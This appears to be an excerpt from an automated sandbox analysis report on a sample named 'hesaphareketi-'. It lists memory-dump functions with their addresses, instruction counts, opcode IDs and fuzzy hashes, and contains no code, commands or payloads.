                                            Function 0577AF08 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2415bf624a20aa98cd5b69f655a307d31ed9bcde42f2f59d42d47dcc9e2d4c1b
                                            • Instruction ID: 7b18d0896275b5eaa782885c2747fbe6a70b519fca277330774c713e2a201f55
                                            • Opcode Fuzzy Hash: 2415bf624a20aa98cd5b69f655a307d31ed9bcde42f2f59d42d47dcc9e2d4c1b
                                            • Instruction Fuzzy Hash: 2B01B1707042048FDB24DB28E450D6AB7B6BFC5311B2481B9E4198B222CB31EC0BCB40
                                            Function 05775A34 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0b810d9d35965178b7cd767d37b1e14c623a01ac9e951795ce059238eb4e0b62
                                            • Instruction ID: 840259813530339423305ee671cc789432180f8960f186237684e6140a86a73c
                                            • Opcode Fuzzy Hash: 0b810d9d35965178b7cd767d37b1e14c623a01ac9e951795ce059238eb4e0b62
                                            • Instruction Fuzzy Hash: 9601A7703007144BE718ABB8D4297677AD6EB84704F00845DE24A8B792CFF6984553A1
                                            Function 0098D7C5 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1236941468.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_98d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82c152f47d80e6f561aea25e4b51de68625a31db7325e04071b8c175a7f44c1e
                                            • Instruction ID: 2dc37fe2ae0d0f41896e313c2439f199d19f15184bf0ee94e42b03bf7df316fc
                                            • Opcode Fuzzy Hash: 82c152f47d80e6f561aea25e4b51de68625a31db7325e04071b8c175a7f44c1e
                                            • Instruction Fuzzy Hash: D301F27140A3409AE7206A11CC84B66BB9CDF41325F18C86AED081B3C2C2389C45CBB2
                                            Function 05774808 Relevance: .0, Instructions: 44COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d316d8035defded1f12b6f0dbff1ff7b5a45ff396b4899e42af8202155a459cd
                                            • Instruction ID: 7e7bf0bfa70c8b9cf333756d23c275308c0085e902bf560d7f3b26c2a96c481f
                                            • Opcode Fuzzy Hash: d316d8035defded1f12b6f0dbff1ff7b5a45ff396b4899e42af8202155a459cd
                                            • Instruction Fuzzy Hash: 5E1100B5C003488FCB20DF9AD445B9EFBF4EB48320F20841AD959A7340C779A945CFA5
                                            Function 0577CD48 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f993725625f9caa6cefbfa3ab2a37bc4b9894937ff0060a123c8e2103b749005
                                            • Instruction ID: 065c45f2983fed82dcb6b3dd9ca65c2b3ea013de761b33a5cda8843dbd2dad57
                                            • Opcode Fuzzy Hash: f993725625f9caa6cefbfa3ab2a37bc4b9894937ff0060a123c8e2103b749005
                                            • Instruction Fuzzy Hash: 27F0BB3134071827EF246565BC59BBE368B97C5F14F04443BE609D72C0CDB59C41A394
                                            Function 0A8C0FF6 Relevance: .0, Instructions: 43COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 403ca20c6ea97ec0d906db157277749e527139eaa8ffa0e887b35fbcc869bc94
                                            • Instruction ID: 38c5b622ae0b9803cc6f8b7a978b79dbd81bf32fa9e4434f0ab67e877e6897de
                                            • Opcode Fuzzy Hash: 403ca20c6ea97ec0d906db157277749e527139eaa8ffa0e887b35fbcc869bc94
                                            • Instruction Fuzzy Hash: 970180B0E58246EEE710CF94D48ABBEBFB0AB04364F14856ED510DB683E77981818F91
                                            Function 0577AF18 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 905a751b2ebb79318210aae462717733ce4cdbab0ba6b2780a08582287ae00d3
                                            • Instruction ID: f43893f04bc895cd69f6510f35be030d2e1c8285eb9565d706c1b84799d07b0c
                                            • Opcode Fuzzy Hash: 905a751b2ebb79318210aae462717733ce4cdbab0ba6b2780a08582287ae00d3
                                            • Instruction Fuzzy Hash: 3E016D743042048FDB24EB29E454D2AB3AAFFC5611B64C579E4198B225DB71EC0ACB50
                                            Function 0577F940 Relevance: .0, Instructions: 41COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0f1418c077935c1e7587abbd9e43bb7d4ebcd007fb7a198c329d677806c1efc2
                                            • Instruction ID: 88d75a5a0511bf2ab3590f48503327bb49e59fdad9b418d66d8d39a7d0ec9ad5
                                            • Opcode Fuzzy Hash: 0f1418c077935c1e7587abbd9e43bb7d4ebcd007fb7a198c329d677806c1efc2
                                            • Instruction Fuzzy Hash: 1BF08131310214AFDF142B35A869B793EF6EBCA213F100078F906C6390EE7298429BA1
                                            Function 0577F023 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b41ce6f96740e5273a1a18991b66b2d21616fa1ea7a1c0c31a8d0b9751ed7bd5
                                            • Instruction ID: a7eacddb0ec02522330e9ecf004f85d874139ee0edad40293ef4284834056c8a
                                            • Opcode Fuzzy Hash: b41ce6f96740e5273a1a18991b66b2d21616fa1ea7a1c0c31a8d0b9751ed7bd5
                                            • Instruction Fuzzy Hash: 96F0CD302047094FDF25F639F554B367BA5AF41344F444425D5058B76AFB25C80BE7A1
                                            Function 05773A40 Relevance: .0, Instructions: 40COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f7db60cb22db692c7aa14ea8d6c029f30e32a94364619fd62f7295c91e5bca61
                                            • Instruction ID: 027a68cd8122cc42f2207dc18fd01e090bde5ce04e102eb2b164fee414667236
                                            • Opcode Fuzzy Hash: f7db60cb22db692c7aa14ea8d6c029f30e32a94364619fd62f7295c91e5bca61
                                            • Instruction Fuzzy Hash: 72F03675B0011D9B8F15BFA8A8589BFBABADB88510B100439E505E7340DA354A11A7EB
                                            Function 0098D7C4 Relevance: .0, Instructions: 36COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1236941468.000000000098D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0098D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_98d000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80674a78e04c06d99cedc3fad3ba1101c92625743ae32317a326f2072ded42de
                                            • Instruction ID: ee241370f727960018f37bdff7ce76ae7f25dbff10e1fa34dfe976f3f3943e84
                                            • Opcode Fuzzy Hash: 80674a78e04c06d99cedc3fad3ba1101c92625743ae32317a326f2072ded42de
                                            • Instruction Fuzzy Hash: 0BF0A971405240AEE7209E06D884B62FBACEB51324F18C45AED080B282C278AC44CBA1
                                            Function 05776B41 Relevance: .0, Instructions: 30COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fc852b4aa90e102781eba1f11ddd952bea809fd51f417df481acb31cef02a5a2
                                            • Instruction ID: 04f30d0a9479dbbc86e9e3466f31f71a94101ca4a51fc88142976a96db58a161
                                            • Opcode Fuzzy Hash: fc852b4aa90e102781eba1f11ddd952bea809fd51f417df481acb31cef02a5a2
                                            • Instruction Fuzzy Hash: B0F0EC36200D288BCB10CF48F1869A5B7A5F743314F25C081E80A8F27AD336E812A784
                                            Function 05776B50 Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee21aebf7ef51e7bb061ec87eb0e47a6079a7422a7444ff86efc4d28fa4ab99a
                                            • Instruction ID: 37fc444fcc162d33be9de36ce13d142946360fefdd8207761fad463b015dd6cf
                                            • Opcode Fuzzy Hash: ee21aebf7ef51e7bb061ec87eb0e47a6079a7422a7444ff86efc4d28fa4ab99a
                                            • Instruction Fuzzy Hash: 0BE06D32680A28878600DF48F4824B9B7A9E745A6972884A6E80DCA611F232DC2BD7C4
                                            Function 0577CEC9 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 47f799b743b2d140c97bf039b85d87370b3c36ef23f7c6ff3d7e16e928058b77
                                            • Instruction ID: d49e1aff26d5e53eba3f69274a113e7045378a87dd75d38e22171796ec9c92e4
                                            • Opcode Fuzzy Hash: 47f799b743b2d140c97bf039b85d87370b3c36ef23f7c6ff3d7e16e928058b77
                                            • Instruction Fuzzy Hash: 06F0E570A4D3814FCB17DB3C99441097FE1AF5A114F0884BAE480CF283E634845BD753
                                            Function 0A8C0FA0 Relevance: .0, Instructions: 25COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce732deebfcd1ceab42f422136eddd0eb2462a9dc96d60ab0f4047fea5230ddb
                                            • Instruction ID: ae3fa1f56276af8e0d056911f47fa260cf3335be46fe5516f3058f5f673b207d
                                            • Opcode Fuzzy Hash: ce732deebfcd1ceab42f422136eddd0eb2462a9dc96d60ab0f4047fea5230ddb
                                            • Instruction Fuzzy Hash: 64E0D862A64314D5CB20CBA4A4036EE7BB097012B9F20455BD020CBE81E63B428A4FC2
                                            Function 0577E848 Relevance: .0, Instructions: 24COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f2c99c640c1815c72a3c0cf582e082470917eb353b9f0a33bf29bf8ca21c8993
                                            • Instruction ID: 02a50d82fda58e324265d8af693e2896978fb14ce16bf09b051c3e2c8f96a53d
                                            • Opcode Fuzzy Hash: f2c99c640c1815c72a3c0cf582e082470917eb353b9f0a33bf29bf8ca21c8993
                                            • Instruction Fuzzy Hash: F6E04F757042589FCB025778B9189643F79AB4A11434241D6F849DB762EB21CC116762
                                            Function 05772AF8 Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 36106539aa0982baff53159c2bc2a0c150614d460eaf521363cea57be26d28e5
                                            • Instruction ID: 77459264736798ee18ba1f7d1c0356db0b1d70076f27600f7567ca85f866ebf2
                                            • Opcode Fuzzy Hash: 36106539aa0982baff53159c2bc2a0c150614d460eaf521363cea57be26d28e5
                                            • Instruction Fuzzy Hash: E8E09235A0124DDFC740EFB0E45185CBBB5EB4531071181AAD808D7316EB326F0AFB51
                                            Function 05775ABC Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 24ba7aa7e9f06ac5a13f86c94686cf055c57a9ccccbad7732de0eed2667d3880
                                            • Instruction ID: 834079914d2a201df86bbc8906aa54a3f13aa9f80d9b080cd730a966674b7862
                                            • Opcode Fuzzy Hash: 24ba7aa7e9f06ac5a13f86c94686cf055c57a9ccccbad7732de0eed2667d3880
                                            • Instruction Fuzzy Hash: 0CE04F316402048FCB21EA19E498BD533A9EB4A354F1985B3F509EB224C675A8829B42
                                            Function 05775908 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b03228f3498b10be5bd3b49f8e7de318a4aa0b553c54d647dd2969ecfbb83ac0
                                            • Instruction ID: 7b71aae9349d11eb4b3c30b1b5f4b1355727a0e593b4431e95e0da2b08c43d79
                                            • Opcode Fuzzy Hash: b03228f3498b10be5bd3b49f8e7de318a4aa0b553c54d647dd2969ecfbb83ac0
                                            • Instruction Fuzzy Hash: 63E0CD37145618AF8B0157859C48C85FF99EB09370705C457F30947131C512C814FB91
                                            Function 05776B98 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da66c9cb8b706af40f4d5afa5b4a6a9da7d12cdfb649ddd99fdc445c5927eee2
                                            • Instruction ID: 3d3d75dfa28cfa61002d5a340e3cd0f1293a857f49ed8274b3fb1c7686c6da98
                                            • Opcode Fuzzy Hash: da66c9cb8b706af40f4d5afa5b4a6a9da7d12cdfb649ddd99fdc445c5927eee2
                                            • Instruction Fuzzy Hash: 13E0D832800B6C5FCB11EB08E148D91BFA4F703320F438096D556DB0B6D778EC44ABA1
                                            Function 0577CA93 Relevance: .0, Instructions: 22COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7537db55254d54e679f5cc1e37c4820d78c3ebec25304676d98536230962bb09
                                            • Instruction ID: f6456fad3bd1644422e1e01196d1ad8f84edf87bed7afbb4daaff5f770bb564b
                                            • Opcode Fuzzy Hash: 7537db55254d54e679f5cc1e37c4820d78c3ebec25304676d98536230962bb09
                                            • Instruction Fuzzy Hash: 02E0DF3230470107D311E698D8817CAE792AFC8224B04892AE1458B704DE60AC1B43C5
                                            Function 05777F71 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b02c2a421469a0ad04b7be22bbb3edd0632876b1a0af05277c03dfe33423b567
                                            • Instruction ID: aab66afb1e5062797df85fd3d23890120b6c2189d37045451c417cf9e5e3445f
                                            • Opcode Fuzzy Hash: b02c2a421469a0ad04b7be22bbb3edd0632876b1a0af05277c03dfe33423b567
                                            • Instruction Fuzzy Hash: F4E086B24097814FC717DB6CE6212527FE1EF47210B4944EFD1A5CF6A6E524D8068761
                                            Function 05776A28 Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e59899bbeb10bb8ab23bd5f04831122b730d02e06c1bb7affc577c6f2f56bd2f
                                            • Instruction ID: f32b79f1439ee23015a2a8dd140fa05172d2f881411153396ed14282e274bc6a
                                            • Opcode Fuzzy Hash: e59899bbeb10bb8ab23bd5f04831122b730d02e06c1bb7affc577c6f2f56bd2f
                                            • Instruction Fuzzy Hash: 06E0863B655354BFD7124784AC05C95BF95AB0D260309C09BF2494B172C2628550FB55
                                            Function 05772B08 Relevance: .0, Instructions: 19COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cab2b8c04a7b8dd8f407a45f8601eead38992141223c3f937c0d76c6af57e2e3
                                            • Instruction ID: 779d7a398b3a3eab96783edfb7c2c8ac8816b7afe287ac634e58c16c6121ce1b
                                            • Opcode Fuzzy Hash: cab2b8c04a7b8dd8f407a45f8601eead38992141223c3f937c0d76c6af57e2e3
                                            • Instruction Fuzzy Hash: C1E08634A0020DEFCB40FFA1E55185CBBF9FB453007208199D80493319EB326F05EB51
                                            Function 0577EFF3 Relevance: .0, Instructions: 18COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ee9ff692d887adfbd6620f0110ad323a74841ab3698838abd92e99204107645
                                            • Instruction ID: 207743c8c2dc332e784752e017e0f568cc7ccdf396e5d13510bbc5334eda2dd2
                                            • Opcode Fuzzy Hash: 7ee9ff692d887adfbd6620f0110ad323a74841ab3698838abd92e99204107645
                                            • Instruction Fuzzy Hash: 64D0A7312211189FCF141674F50D275BFA9E70A225F144075F005C2740DD728402D7A0
                                            Function 05775890 Relevance: .0, Instructions: 17COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2759d929a4bd4d1d3600bb9382aca8c3dd2553775f3895088c28ef74b721a5c0
                                            • Instruction ID: f716a6e03489133b0be34da6dc5ec55989cd099d5853d6c852a2b9811e037070
                                            • Opcode Fuzzy Hash: 2759d929a4bd4d1d3600bb9382aca8c3dd2553775f3895088c28ef74b721a5c0
                                            • Instruction Fuzzy Hash: 11D02232741218BFE90036C56C08EBEBF5DFB8AB68B14108AF3045E002D553EC0393DA
                                            Function 0577E858 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c65652365882968344d30e6f5642c243669297eded163c864080c73a44444897
                                            • Instruction ID: 21c8ed457fcb130a5383de61ff6f66d37aa534da6d76fe4a4113328fab2084f0
                                            • Opcode Fuzzy Hash: c65652365882968344d30e6f5642c243669297eded163c864080c73a44444897
                                            • Instruction Fuzzy Hash: 88D0A739700014DF8741ABA8F409C693BA9EF8E2143014151F909D7361EF31DC005BA1
                                            Function 0A8C0FB0 Relevance: .0, Instructions: 16COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 429b2e30a47d66ed4de9a88c6a68ba95a2c0b18ccf982b6e2c9d9156bc328a4c
                                            • Instruction ID: 48f835b8c82aba0215c6fb2481cb3554da6aca172fb3833a30f413e54e7c1716
                                            • Opcode Fuzzy Hash: 429b2e30a47d66ed4de9a88c6a68ba95a2c0b18ccf982b6e2c9d9156bc328a4c
                                            • Instruction Fuzzy Hash: A6D062B0D5830DEFD750EFB9891575FBBF56B04244F10896AC015E6245F7B482458F91
                                            Function 0577DF80 Relevance: .0, Instructions: 14COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3812ef4830f61981a1e983f72def55bd440f6e935eb0f46739acd11e4583134
                                            • Instruction ID: 6855e95db0a46eab90e13ce5ab45c12eeecb13d6bab2649302e84111768c8c04
                                            • Opcode Fuzzy Hash: f3812ef4830f61981a1e983f72def55bd440f6e935eb0f46739acd11e4583134
                                            • Instruction Fuzzy Hash: 66D0A735640208FFE7407FF4AC01E667729ABCC310F00D041F51819181C532A451EBA0
                                            Function 0577F000 Relevance: .0, Instructions: 12COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7736fb25c9f9a349f9550a781d39003eb29636337d9c18b457ddd596fa3e158a
                                            • Instruction ID: ecc18dc1d696c0aa510fca448c3b8e347b87761d313ae88e16ebf642995db6eb
                                            • Opcode Fuzzy Hash: 7736fb25c9f9a349f9550a781d39003eb29636337d9c18b457ddd596fa3e158a
                                            • Instruction Fuzzy Hash: D3C08C312222288B87142678B00D089BFFDEA5D136310447AF409C2300CEB3C80187E0
                                            Function 0577DF90 Relevance: .0, Instructions: 11COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef48856c50920dd3ad900e375baf2c0f7f203b75575029cb9c54c242f2586730
                                            • Instruction ID: 3bdc2d2112a8bab4ac7efff2c833fb1da7c691d9a16e0eeea2be92a24f0143c4
                                            • Opcode Fuzzy Hash: ef48856c50920dd3ad900e375baf2c0f7f203b75575029cb9c54c242f2586730
                                            • Instruction Fuzzy Hash: 26C08C3630020CBFDB80AFD4D800D66776DAB08724F50E104FA080E211C272F862EBA0
                                            Function 05775840 Relevance: .0, Instructions: 6COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e13dd7524075d236f2a8202e58838eb1916d0928cd77514ef101d069b6641d7
                                            • Instruction ID: ad4c06cabbc5bd5b4b6a3091fdbff8d41b8d10c554d59040866b072f927064f4
                                            • Opcode Fuzzy Hash: 9e13dd7524075d236f2a8202e58838eb1916d0928cd77514ef101d069b6641d7
                                            • Instruction Fuzzy Hash: A1A00124A56A8983A81CA2A428DC2294E92AA817497C2ACA6950588000CE658809601A
                                            Function 05777E73 Relevance: .0, Instructions: 5COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fd0acc33fce41b490692fb3bd29f5ad23c8b0a5178a23082aeeed6ed3e042b3b
                                            • Instruction ID: 2501c2463d014cf16267364c8b60919460bcba1a17b5e22b3c95d57526439c47
                                            • Opcode Fuzzy Hash: fd0acc33fce41b490692fb3bd29f5ad23c8b0a5178a23082aeeed6ed3e042b3b
                                            • Instruction Fuzzy Hash: 20A02403D005C4C5DF0C7370CC4F30D0D504710144FDC04DC4C00C5303C41CC0000155

                                            Non-executed Functions

                                            Function 0A8C1B30 Relevance: 2.8, Strings: 2, Instructions: 298COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
